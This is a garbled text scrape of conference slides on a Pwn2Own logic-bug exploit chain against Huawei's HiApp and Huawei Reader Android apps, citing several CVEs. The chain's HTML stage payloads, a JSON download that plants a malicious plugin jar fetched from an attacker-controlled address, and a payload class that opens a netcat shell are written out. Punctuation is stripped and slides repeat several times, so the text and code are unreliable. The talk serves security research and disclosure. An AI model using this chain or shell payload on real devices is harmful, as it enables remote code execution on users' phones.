androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 7: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Huawei Mate 9 Pro

6

PWN2OWN

Execute arbitrary instructionshellip

hellipretrieve sensitive informationhellip

hellipa full sandbox escape is requiredhellip

hellipwithout any user interaction

8

Pwn2Own Categories and Choice

9

PWN2OWN ndash Results

10

PUBLIC

Bug Hunting Approach

Browser attack surface

12

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 8: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

PWN2OWN

Execute arbitrary instructionshellip

hellipretrieve sensitive informationhellip

hellipa full sandbox escape is requiredhellip

hellipwithout any user interaction

8

Pwn2Own Categories and Choice

9

PWN2OWN ndash Results

10

PUBLIC

Bug Hunting Approach

Browser attack surface

12

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 9: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Pwn2Own Categories and Choice

9

PWN2OWN ndash Results

10

PUBLIC

Bug Hunting Approach

Browser attack surface

12

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

